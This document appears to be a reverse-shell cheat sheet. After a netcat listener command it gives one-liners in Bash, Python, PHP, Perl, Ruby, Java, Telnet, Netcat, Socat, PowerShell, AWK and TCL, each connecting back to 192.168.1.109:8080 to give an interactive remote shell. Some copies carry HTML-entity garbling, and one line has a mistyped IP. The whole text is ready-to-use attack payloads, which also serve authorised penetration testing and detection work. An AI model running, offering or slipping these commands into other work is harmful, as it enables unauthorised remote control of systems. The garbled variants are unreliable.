Reverse Shell Cheat Sheet

Listener:

nc -l -v -p 8080

Bash

exec 5<>/dev/tcp/192.168.1.109/8080;cat <&5 | while read line; do $line 2>&5 >&5; done

 

exec /bin/sh 0</dev/tcp/192.168.1.109/8080 1>&0 2>&0

 

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

 

bash -i >& /dev/tcp/192.168.1.109/8080 0>&1

 

bash -i &gt;&amp; /dev/tcp/192.168.1.109//8080 0&gt;&amp;1

 

TCLsh

echo ‘set s [socket 192.168.1.109 8080];while 42 { puts -nonewline $s “shell>”;flush $s;gets $s c;set e “exec $c”;if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;’ | tclsh

 

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.109”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP

php -r ‘$sock=fsockopen(“192.168.1.109”,8080);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’

 

php -r ‘$sock=fsockopen(“192.168.1.109”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’

 

php -r ‘$s=fsockopen(“192.168.1.109”,8080);shell_exec(“/bin/sh -i <&3 >&3 2>&3”);’

php -r ‘$s=fsockopen(“192.168.1.109”,8080);`/bin/sh -i <&3 >&3 2>&3`;’

php -r ‘$s=fsockopen(“192.168.1.109”,8080);system(“/bin/sh -i <&3 >&3 2>&3”);’

php -r ‘$s=fsockopen(“192.168.1.109”,8080);popen(“/bin/sh -i <&3 >&3 2>&3”, “r”);’

 

Perl

perl -e ‘use Socket;$i=”192.168.1.109″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

perl -e ‘use Socket;$i=”192.168.1.109″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”&gt;&amp;S”);open(STDOUT,”&gt;&amp;S”);open(STDERR,”&gt;&amp;S”);exec(“/bin/sh -i”);};’

 

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.1.109:8080″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

 

Ruby

 

ruby -rsocket -e’f=TCPSocket.open(“192.168.1.109”,8080).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

ruby -rsocket -e’f=TCPSocket.open(“192.168.1.109”,8080).to_i;exec sprintf(“/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d”,f,f,f)’

 

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“192.168.1.109″,”8080″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

 

Java

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.109/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

 

Telnet:

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.109 8080 0/tmp/p

 

rm -f x; mknod x p && telnet 192.168.1.109 8080> 0<x | /bin/bash 1>x

 

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 192.168.1.109 8080 > f

 

telnet 192.168.1.109 8080 | /bin/bash | telnet 192.168.1.109

 

Netcat

 

nc -e /bin/sh 192.168.1.109 8080

 

/bin/sh | nc 192.168.1.109 8080

 

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.109 8080 0/tmp/p

 

Socat

socat tcp-connect:192.138.1.109:8080 exec:”bash -li”,pty,stderr,setsid,sigint,sane

 

Powershell

powershell.exe -w hidden -c ‘$client = New-Object System.Net.Sockets.TCPClient(“192.168.1.109”,8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()’

 

AWK

 

awk ‘BEGIN {s = “/inet/tcp/0/192.168.1.109/8080”; while(42) { do{ printf “shell>” |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != “exit”) close(s); }}’ /dev/null

 
